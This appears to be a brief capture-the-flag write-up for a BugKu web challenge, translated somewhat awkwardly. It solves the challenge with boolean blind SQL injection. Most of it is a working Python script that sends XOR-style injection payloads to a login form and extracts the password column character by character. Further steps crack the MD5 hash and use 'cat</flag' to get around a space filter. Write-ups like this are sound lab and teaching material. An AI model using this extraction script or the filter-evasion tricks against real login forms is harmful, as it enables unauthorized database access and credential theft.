0. Open the web page and view the title description
Description: Does it all filter out despair?
According to the description, the description is blind
1. Write a python script and run to get the password
import requests
session = requests.Session()
url="http://114.67.246.176:15649//login.php"
flag=''
for i in range(1,250):
left=32
right=128
mid=(left+right)//2
while(left<right):
payload="admin'^((ascii(mid((select(group_concat(passwd)))from(%s)))>%s))^'1"%(i,mid)
data = {'uname': payload, 'passwd': 'admin'}
res = requests.post(url, data=data)
if 'password' in res.text:
left=mid+1
else:
right=mid
mid=(left+right)//2
if(mid==32 or mid==127):
break
flag=flag+chr(mid)
print(flag)
2. Perform md5 decryption
Get the password: bugkuctf
3. Log in to the webpage, cat</flag to query flag (spaces are filtered)
